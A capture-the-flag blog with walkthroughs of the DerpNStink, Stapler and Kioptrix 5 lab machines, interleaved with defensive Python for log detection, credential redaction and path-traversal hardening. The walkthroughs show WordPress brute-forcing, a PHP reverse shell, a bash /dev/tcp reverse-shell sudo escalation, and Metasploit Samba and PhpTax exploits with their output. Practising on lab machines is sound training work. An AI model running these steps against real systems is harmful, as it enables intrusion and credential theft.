DerpNStink: 1 walkthrough

Walkthrough of DerpNstink: 1


root@kali:~# nmap -sT -A -sV --version-intensity 6 -p-

21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open http Apache ht
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-title: DeRPnStiNK

Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nothing from the FTP server:

root@kali:~# nmap --script=*ftp* --script-args=unsafe=1 -p 20,21

Starting Nmap 7.50 ( ) at 2018-03-06 06:35 EST
Nmap scan report for
Host is up (0.00031s latency).

20/tcp closed ftp-data
21/tcp open ftp
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 11315 guesses in 600 seconds, average tps: 18.7

Using metasploit we search for SSH users:

[+] – SSH – User ‘gopher’ found
[+] – SSH – User ‘kernoops’ found
[+] – SSH – User ‘libuuid’ found
[+] – SSH – User ‘list’ found
[+] – SSH – User ‘listen’ found
[+] – SSH – User ‘lp’ found
[+] – SSH – User ‘man’ found
[+] – SSH – User ‘mountfsys’ found
[+] – SSH – User ‘nobody’ found
[+] – SSH – User ‘nobody4’ found
[+] – SSH – User ‘nuucp’ found
[+] – SSH – User ‘sync’ found
[+] – SSH – User ‘web’ found
[+] – SSH – User ‘webmaster’ found
[+] – SSH – User ‘zabbix’ found

Using searchsploit we find an OpenSSH vulnerability (CVE-2016-6210, a timing-based username enumeration) that might help confirm which SSH users exist:

python ./ -U /usr/share/wordlists/metasploit/unix_users.txt -e --trials 5 --bytes 10

User name enumeration against SSH daemons affected by CVE-2016-6210
Created and coded by 0_o (nu11.nu11 [at], PoC by Eddie Harari

[*] Testing SSHD at:, Banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
[*] Getting baseline timing for authenticating non-existing users…………
[*] Baseline mean for host is 0.0631635 seconds.
[*] Baseline variation for host is 0.0109688798904 seconds.
[*] Defining timing of x < 0.0960701396712 as non-existing user.
[*] Testing your users…
[+] rfindd – timing: 0.110398
[+] root – timing: 0.1100708
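Seen from the other side: here is an added example, not part of the walkthrough, of how an administrator would spot this enumeration in the server's own logs. A timing probe like the one above, and the Metasploit ssh_enumusers scan before it, leave one "Invalid user" line per guessed name in sshd's syslog output, so the signature is a burst of distinct invalid usernames from a single source within a short window. The log lines below are constructed (hostname, PIDs and source addresses are made up; the usernames mirror the wordlist hits), the thresholds are assumptions to tune per environment, and the timing leak itself is fixed by upgrading OpenSSH (the bug was patched in 7.3; the target runs 6.6.1p1).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log excerpt in syslog format; hostname, PIDs and source addresses are
# made up, the usernames mirror the wordlist hits above. (Not taken from the walkthrough.)
SAMPLE_AUTH_LOG = """\
Mar  6 06:40:01 derp sshd[2101]: Invalid user gopher from 10.0.0.5 port 50211
Mar  6 06:40:01 derp sshd[2101]: Failed password for invalid user gopher from 10.0.0.5 port 50211 ssh2
Mar  6 06:40:02 derp sshd[2105]: Invalid user kernoops from 10.0.0.5 port 50212
Mar  6 06:40:02 derp sshd[2107]: Invalid user libuuid from 10.0.0.5 port 50213
Mar  6 06:40:03 derp sshd[2109]: Invalid user nuucp from 10.0.0.5 port 50214
Mar  6 06:40:03 derp sshd[2111]: Invalid user zabbix from 10.0.0.5 port 50215
Mar  6 06:40:04 derp sshd[2113]: Invalid user webmaster from 10.0.0.5 port 50216
Mar  6 06:40:04 derp sshd[2115]: Failed password for root from 10.0.0.5 port 50217 ssh2
Mar  6 07:15:30 derp sshd[2301]: Invalid user backup from 192.168.1.20 port 41000
Mar  6 07:15:31 derp sshd[2303]: Accepted publickey for stinky from 192.168.1.20 port 41001 ssh2
"""

# syslog prefix: "Mon dd HH:MM:SS host sshd[pid]: message"
LINE_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<msg>.*)$")
INVALID_RE = re.compile(r"^Invalid user (?P<user>\S+) from (?P<src>\S+)")


def parse_invalid_user_events(log_text):
    """Return (timestamp, source_ip, username) for every 'Invalid user' line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        inv = INVALID_RE.match(m.group("msg"))
        if not inv:
            continue
        # syslog timestamps carry no year; the default (1900) is fine for intra-day windows
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        events.append((ts, inv.group("src"), inv.group("user")))
    return events


def find_enumeration(log_text, min_distinct_users=5, window_seconds=60):
    """Flag sources that try at least min_distinct_users different non-existent usernames
    inside one window. Returns {source_ip: sorted list of every username that source tried}.
    The thresholds are assumptions; tune them to the environment's normal noise."""
    by_src = defaultdict(list)
    for ts, src, user in parse_invalid_user_events(log_text):
        by_src[src].append((ts, user))
    flagged = {}
    for src, evs in by_src.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            in_window = {u for t, u in evs[i:] if (t - start).total_seconds() <= window_seconds}
            if len(in_window) >= min_distinct_users:
                flagged[src] = sorted({u for _, u in evs})
                break
    return flagged


if __name__ == "__main__":
    for src, users in find_enumeration(SAMPLE_AUTH_LOG).items():
        print(f"possible SSH username enumeration from {src}: {', '.join(users)}")
```

Run against a real /var/log/auth.log the same function will also catch plain password spraying, since that produces the same "Invalid user" lines; the "Failed password for root" line is deliberately left out of the count because root exists and a single failure against it is everyday noise.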

dirb finds us some interesting results:

---- Entering directory: ----
---- Entering directory: ----
---- Entering directory: ----

I can't find the phpMyAdmin version, but I do find the PHP version, PHP/5.5.9-1ubuntu4.22, which might help at some point.

Using a longer wordlist we find, which offers some clues:

We try to log in via SSH, but we get trolled:

Another dirb result catches our attention.

This redirects to http://derpnstink.local/weblog/, which we cannot view because the hostname does not resolve. So we add the following to our /etc/hosts file:

root@kali:~/Desktop/AUTOMATED_actions# cat /etc/hosts localhost kali

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

# stuff derpnstink.local www.derpnstink.local

Now we can access the page. It is obviously WordPress, so we fire up wpscan to enumerate users and brute-force their passwords:

wpscan --url http://derpnstink.local/weblog/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2

Brute Forcing ‘admin’ Time: 00:00:43 <========== > (1815 / 20470) 8.86% ETA: 00:07:28
| Id | Login | Name | Password |
| 1 | unclestinky | 404 Not | |
| 2 | admin | admin – DeRPnStiNK Professional | admin |

[+] Finished: Tue Mar 6 09:05:20 2018
[+] Requests Done: 22656

wpscan also finds some vulnerabilities:

We download and run

I copy a PHP reverse shell and start a netcat listener:

cp /usr/share/webshells/php/php-reverse-shell.php ./

nc -lvvp 777

I edit the shell with my IP and port and run the exploit.

python ./ -t http://derpnstink.local/weblog/ -f ./php-reverse-shell.php -u admin -p admin

We have a limited shell:

Beautify the shell:

echo $SHELL
export TERM=xterm-256color
export SHELL=/bin/bash
stty rows 55 columns 205
reset

We find some users in /etc/passwd:

cat /etc/passwd
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

In /var/www/html/weblog (wp-config.php) we find the database user and password:

/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'mysql');

Log in to the MySQL server:

mysql -uroot -pmysql

mysql> SELECT * FROM wp_users;
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | flag2 |
| 1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky | unclestinky@DeRPnStiNK.local | | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 | 0 | unclestinky | |
| 2 | admin | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin | admin@derpnstink.local | | 2017-11-13 04:29:35 | | 0 | admin | |
2 rows in set (0.00 sec)


Using hashcat I recover the following WordPress passwords:



We find the first flag by logging in to WordPress as unclestinky.



Clue in /support:

www-data@DeRPnStiNK:/support$ cat troubleshooting.txt
On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.

However i dont want to specify each command to allow

How can I exclude these commands from password protection to sudo?


Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.

Please contact the Client Support team at if you have any further questions or issues.

Thank you for using our product.


The pastebin page says:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

It seems that we need to escalate to the user mrderp, who can run that path with sudo.

We go to /home:

www-data@DeRPnStiNK:/home$ ls -alh
total 16K
drwxr-xr-x  4 root   root   4.0K Nov 12 12:54 .
drwxr-xr-x 23 root   root   4.0K Nov 12 13:39 ..
drwx------ 10 mrderp mrderp 4.0K Jan  9 12:15 mrderp
drwx------ 12 stinky stinky 4.0K Jan  9 12:14 stinky

Password reuse?

su stinky
Password: wedgie57


We cannot sudo as stinky:

stinky@DeRPnStiNK:/home$ sudo su -l
[sudo] password for stinky: wedgie57

stinky is not in the sudoers file. This incident will be reported.

We find several SSH private keys, but none of them help.



stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are…
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~/ftp/files/network-logs$ ls -a
. .. derpissues.txt
stinky@DeRPnStiNK:~/ftp/files/network-logs$ pwd

We cannot run tcpdump ourselves because of permissions, but we do find a pcap file in /home/stinky/Documents.

We dump it to a text file and grep that file for "pass":

stinky@DeRPnStiNK:~/Documents$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
reading from file ./derpissues.pcap, link-type LINUX_SLL (Linux cooked)
stinky@DeRPnStiNK:~/Documents$ grep -i pass ./derpissues.txt
0x0400: 3034 3032 6166 3626 5f77 705f 6874 7470 0402af6&_wp_http
0x0410: 5f72 6566 6572 6572 3d25 3246 7765 626c _referer=%2Fwebl
0x0420: 6f67 2532 4677 702d 6164 6d69 6e25 3246 og%2Fwp-admin%2F
0x0430: 7573 6572 2d6e 6577 2e70 6870 2675 7365 user-new.php&use
0x0440: 725f 6c6f 6769 6e3d 6d72 6465 7270 2665 r_login=mrderp&e
0x0450: 6d61 696c 3d6d 7264 6572 7025 3430 6465 mail=mrderp%40de
0x0460: 7270 6e73 7469 6e6b 2e6c 6f63 616c 2666 rpnstink.local&f
0x0470: 6972 7374 5f6e 616d 653d 6d72 266c 6173 irst_name=mr&las
0x0480: 745f 6e61 6d65 3d64 6572 7026 7572 6c3d t_name=derp&url=
0x0490: 2532 4668 6f6d 6525 3246 6d72 6465 7270 %2Fhome%2Fmrderp
0x04a0: 2670 6173 7331 3d64 6572 7064 6572 7064 &pass1=derpderpd
0x04b0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04c0: 6572 7026 7061 7373 312d 7465 7874 3d64 erp&pass1-text=d
0x04d0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04e0: 6572 7064 6572 7064 6572 7026 7061 7373 erpderpderp&pass
0x04f0: 323d 6465 7270 6465 7270 6465 7270 6465 2=derpderpderpde
0x0500: 7270 6465 7270 6465 7270 6465 7270 2670 rpderpderpderp&p
0x0510: 775f 7765 616b 3d6f 6e26 726f 6c65 3d61 w_weak=on&role=a
0x0520: 646d 696e 6973 7472 6174 6f72 2663 7265 dministrator&cre
0x0530: 6174 6575 7365 723d 4164 642b 4e65 772b ateuser=Add+New+
0x0540: 5573 6572 User
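The hexdump above is enough to reconstruct the whole form submission, which is what an incident responder reviewing this capture would do to establish exactly what leaked. The following added example (not part of the walkthrough) parses the tcpdump -X lines printed above, decodes the URL-encoded POST body, identifies the fields that carry credentials and redacts them for reporting. The hex lines are the ones from the capture; the code around them is my own and is not from tcpdump or WordPress.

```python
import re
from urllib.parse import parse_qs

# Hexdump lines exactly as printed by `tcpdump -X` in the capture above (the HTTP POST body
# of WordPress's user-new.php form). The packet starts mid-body, so the first token is a
# fragment of the preceding field and carries no '='.
HEXDUMP = """\
0x0400: 3034 3032 6166 3626 5f77 705f 6874 7470 0402af6&_wp_http
0x0410: 5f72 6566 6572 6572 3d25 3246 7765 626c _referer=%2Fwebl
0x0420: 6f67 2532 4677 702d 6164 6d69 6e25 3246 og%2Fwp-admin%2F
0x0430: 7573 6572 2d6e 6577 2e70 6870 2675 7365 user-new.php&use
0x0440: 725f 6c6f 6769 6e3d 6d72 6465 7270 2665 r_login=mrderp&e
0x0450: 6d61 696c 3d6d 7264 6572 7025 3430 6465 mail=mrderp%40de
0x0460: 7270 6e73 7469 6e6b 2e6c 6f63 616c 2666 rpnstink.local&f
0x0470: 6972 7374 5f6e 616d 653d 6d72 266c 6173 irst_name=mr&las
0x0480: 745f 6e61 6d65 3d64 6572 7026 7572 6c3d t_name=derp&url=
0x0490: 2532 4668 6f6d 6525 3246 6d72 6465 7270 %2Fhome%2Fmrderp
0x04a0: 2670 6173 7331 3d64 6572 7064 6572 7064 &pass1=derpderpd
0x04b0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04c0: 6572 7026 7061 7373 312d 7465 7874 3d64 erp&pass1-text=d
0x04d0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04e0: 6572 7064 6572 7064 6572 7026 7061 7373 erpderpderp&pass
0x04f0: 323d 6465 7270 6465 7270 6465 7270 6465 2=derpderpderpde
0x0500: 7270 6465 7270 6465 7270 6465 7270 2670 rpderpderpderp&p
0x0510: 775f 7765 616b 3d6f 6e26 726f 6c65 3d61 w_weak=on&role=a
0x0520: 646d 696e 6973 7472 6174 6f72 2663 7265 dministrator&cre
0x0530: 6174 6575 7365 723d 4164 642b 4e65 772b ateuser=Add+New+
0x0540: 5573 6572 User
"""

OFFSET_RE = re.compile(r"^\s*0x[0-9a-fA-F]+:\s*(.*)$")
HEX_GROUP_RE = re.compile(r"^(?:[0-9a-fA-F]{4}|[0-9a-fA-F]{2})$")   # 16-bit groups, last may be one byte


def parse_tcpdump_hex(text):
    """Rebuild the raw bytes from tcpdump -X output, ignoring the trailing ASCII column."""
    chunks = []
    for line in text.splitlines():
        m = OFFSET_RE.match(line)
        if not m:
            continue
        groups = []
        for tok in m.group(1).split():
            # at most 8 groups (16 bytes) per line; the ASCII column follows them
            if len(groups) == 8 or not HEX_GROUP_RE.match(tok):
                break
            groups.append(tok)
        chunks.append(bytes.fromhex("".join(groups)))
    return b"".join(chunks)


def extract_form_fields(text):
    """Decode the application/x-www-form-urlencoded body into {field: value}."""
    body = parse_tcpdump_hex(text).decode("latin-1")
    return {k: v[0] for k, v in parse_qs(body).items()}


CREDENTIAL_HINTS = ("pass", "pwd", "secret", "token", "nonce")


def credential_fields(fields):
    """Field names that look like they carry a secret."""
    return sorted(k for k in fields if any(h in k.lower() for h in CREDENTIAL_HINTS))


def redact(fields):
    """Copy of the fields with secret values replaced, suitable for an incident report."""
    secrets = set(credential_fields(fields))
    return {k: ("<redacted>" if k in secrets else v) for k, v in fields.items()}


if __name__ == "__main__":
    fields = extract_form_fields(HEXDUMP)
    print("cleartext credential fields:", credential_fields(fields))
    for k, v in redact(fields).items():
        print(f"  {k} = {v}")
```

The underlying problem is that wp-admin was used over plain HTTP, so the new account's password crossed the wire in cleartext and survived in a capture on the same host; serving the site over HTTPS and setting FORCE_SSL_ADMIN in wp-config.php closes that gap.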

We have the password:

stinky@DeRPnStiNK:~/Documents$ su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:/home/stinky/Documents$ id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)


Flag 3 found:

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt


mrderp@DeRPnStiNK:~/Downloads$ sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass,

User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*

We create a script whose name matches the sudo rule, put a bash reverse shell in it and start a netcat listener on the local machine:

mrderp@DeRPnStiNK:~/binaries$ echo '#!/bin/bash' >>
mrderp@DeRPnStiNK:~/binaries$ echo 'bash -i >& /dev/tcp/ 0>&1' >>
mrderp@DeRPnStiNK:~/binaries$ cat
bash -i >& /dev/tcp/ 0>&1
mrderp@DeRPnStiNK:~/binaries$ chmod 777
mrderp@DeRPnStiNK:~/binaries$ sudo ./
[sudo] password for mrderp: derpderpderpderpderpderpderp

Got root?

The flag:

root@DeRPnStiNK:/root/Desktop# cat flag.txt

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

Stapler 1 walkthrough.

Stapler 1 vulnerable machine walkthrough.

Firing the recon script returns:

Starting Nmap 7.50 ( ) at 2018-02-27 07:35 EST
Nmap scan report for
Host is up (0.0011s latency).
Not shown: 65523 filtered ports
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| message2.jpgUT
| QWux
| “DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 8
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolOld, Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolNew, LongPassword, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, InteractiveClient, SupportsCompression, ODBCClient, ConnectWithDatabase, LongColumnFlag, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: P\x01."{%VMG\x02\x07s6fVY..jf
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech

enum4linux also finds:

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
kathy           Disk      Fred, What are we doing here?
tmp             Disk      All temporary files should be stored here
IPC$            IPC       IPC Service (red server (Samba, Ubuntu))

[+] Attempting to map shares on
//$ Mapping: DENIED, Listing: N/A
// Mapping: OK, Listing: OK
// Mapping: OK, Listing: OK

I try the low-hanging fruit from my GitHub page and it's a win.

msf > use exploit/linux/samba/is_known_pipename

msf exploit(linux/samba/is_known_pipename) > setg RHOST
msf exploit(linux/samba/is_known_pipename) > options

Name            Current Setting  Required  Description
----            ---------------  --------  -----------
RHOST                            yes       The target address
RPORT           445              yes       The SMB service port (TCP)
SMB_FOLDER                       no        The directory to use within the writeable SMB share
SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)

msf exploit(linux/samba/is_known_pipename) > set RPORT 139
RPORT => 139
msf exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME /tmp
msf exploit(linux/samba/is_known_pipename) > run

[*] – Using location \\\tmp\ for the path
[*] – Retrieving the remote path of the share 'tmp'
[*] – Share 'tmp' has server-side path '/var/tmp'
[*] – Uploaded payload to \\\tmp\
[*] – Loading the payload from server-side path /var/tmp/ using \\PIPE\/var/tmp/…
[-] – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] – Loading the payload from server-side path /var/tmp/ using /var/tmp/…
[-] – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] – Uploaded payload to \\\tmp\
[*] – Loading the payload from server-side path /var/tmp/ using \\PIPE\/var/tmp/…
[-] – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] – Loading the payload from server-side path /var/tmp/ using /var/tmp/…
[+] – Probe response indicates the interactive payload was loaded…
[*] Found shell.
[*] Command shell session 1 opened ( -> at 2018-02-27 08:32:10 -0500

uid=0(root) gid=0(root) groups=0(root)

That was fast, but no pain means no gain.

I upgrade and beautify the shell and print the flag:

python -c 'import pty; pty.spawn("/bin/bash")'

Kioptrix 5 walkthrough

root@kali:~# netdiscover -r

Currently scanning: Finished!   |   Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
              00:50:56:c0:00:08  1         60   VMware, Inc.
              00:50:56:e1:a9:71  1         60   VMware, Inc.
              00:50:56:20:56:e2  1         60   VMware, Inc.
              00:50:56:f8:bd:9c  1         60   VMware, Inc.


nmap -sT -sV -A -p- -n --open

Starting Nmap 7.50 ( ) at 2018-02-26 09:05 EST
Nmap scan report for
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:50:56:20:56:E2 (VMware)
Device type: general purpose|specialized
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (93%),
Aggressive OS guesses: FreeBSD 9.0-RELEASE – 10.3-RELEASE (93%), AVtech Room Alert 26W environmental monitor (91%), Linux 2.6.18 – 2.6.22 (90%), FreeBSD 7.0-RELEASE – 9.0-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

The PHP and Apache versions are not useful here because I am too lazy to try all of the exploits that turn up for them.

Exploits for mod_ssl/2.2.21 also do not seem to work: the server has no HTTPS, and the exploits found (Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit) need SSL.

dirb also finds nothing.

I browse to the site and view the source. Bingo!

<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">

searchsploit to the rescue:

# Exploit Author: Balazs Makany
# Vendor Homepage:
# Software Link:
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[1] Directory Traversal:
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exist in the production code if the example code was
copied into the production environment.
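To make the directory traversal concrete, here is an added example (not pChart's code and not from the walkthrough) in Python: a minimal file-serving routine in the vulnerable form beside its hardened counterpart, run against a constructed directory tree that mirrors the layout above (a web root three levels below a master.passwd file). The file names and contents are made up; the hardened check is the usual one, resolve the path and refuse anything that does not stay under the web root.

```python
import os
import shutil
import tempfile
from pathlib import Path


def read_file_unsafe(base_dir, requested):
    """Vulnerable pattern: the user-supplied name is joined onto the base directory without
    any check, so '../' sequences (or an absolute path) escape the intended directory."""
    with open(os.path.join(base_dir, requested), "rb") as fh:
        return fh.read()


def resolve_under_base(base_dir, requested):
    """Resolve the request and refuse anything that does not end up inside base_dir.
    A real web server has already percent-decoded the path by the time the application
    sees it, so the check works on the decoded string."""
    base = Path(base_dir).resolve()
    target = (base / requested).resolve()   # an absolute 'requested' replaces base entirely
    if target != base and base not in target.parents:
        raise PermissionError(f"refusing to serve {requested!r}: resolves outside {base}")
    return target


def read_file_safe(base_dir, requested):
    """Hardened counterpart of read_file_unsafe."""
    return resolve_under_base(base_dir, requested).read_bytes()


def build_fixture():
    """Constructed directory layout: a web root with one example file and a
    'master.passwd' three levels up, standing in for the FreeBSD file disclosed above."""
    root = Path(tempfile.mkdtemp())
    webroot = root / "www" / "pChart2.1.3" / "examples"
    webroot.mkdir(parents=True)
    (webroot / "chart.png").write_bytes(b"constructed example file")
    (root / "etc").mkdir()
    (root / "etc" / "master.passwd").write_text("root:*:0:0::0:0:Charlie &:/root:/bin/csh\n")  # placeholder
    return root, webroot


def run_demo():
    """Exercise both routines; returns which outcomes occurred."""
    root, webroot = build_fixture()
    try:
        traversal = "../../../etc/master.passwd"
        unsafe_leaked = read_file_unsafe(webroot, traversal).startswith(b"root:")
        try:
            read_file_safe(webroot, traversal)
            safe_blocked = False
        except PermissionError:
            safe_blocked = True
        try:
            read_file_safe(webroot, "/etc/hostname")
            absolute_blocked = False
        except PermissionError:
            absolute_blocked = True
        legit_ok = read_file_safe(webroot, "chart.png") == b"constructed example file"
    finally:
        shutil.rmtree(root)
    return {"unsafe_leaked": unsafe_leaked, "safe_blocked": safe_blocked,
            "absolute_blocked": absolute_blocked, "legit_ok": legit_ok}


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name}: {outcome}")
```

Resolving before comparing is what defeats `..`, symlinks and absolute paths in one go; a string check for `..` alone misses encoded and symlinked variants, which is why the exploit advisory above talks about "customized" traversal URLs.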

We try several directory traversal URLs, but they do not work because I treat the host like a Linux system, while it is a FreeBSD one and the file locations differ.

/etc/passwd does not exist. Instead we have:

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:

I fail to notice that the root user's password hash is right there and move along, searching for the equivalent of /etc/shadow, which on FreeBSD is /etc/spwd.db; it does not load in the browser when I request:

Googling turns up the following:

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser

Which means that if I switch the HTTP User-Agent to Mozilla/4.0, I might get a different web page.

root@kali:~# curl -H "User-Agent:Mozilla/4.0" | head -n1

<title>PHPTAX by William L. Berggren 2003(c)</title>
100  4125    0  4125    0     0  2014k      0 --:--:-- --:--:-- --:--:-- 2014k
curl: (23) Failed writing body (4067 != 4230)
root@kali:~#

root@kali:~# searchsploit phptax
---------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
---------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection (Met | php/webapps/21833.rb

use exploit/multi/http/phptax_exec
set RPORT 8080

msf exploit(multi/http/phptax_exec) > run

[*] Started reverse TCP double handler on
[*] – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo bPVG3SBi0VbyjPza;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo RHWVYqnt2WyVvZsH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “bPVG3SBi0VbyjPza\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “RHWVYqnt2WyVvZsH\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 5 opened ( -> at 2018-02-26 17:22:01 -0500
[*] Command shell session 6 opened ( -> at 2018-02-26 17:22:01 -0500

uid=80(www) gid=80(www) groups=80(www)

We have limited shell.

uname -a reminds us that we are running FreeBSD 9.

We copy the exploit:

cp /usr/share/exploitdb/platforms/freebsd/local/28718.c ./

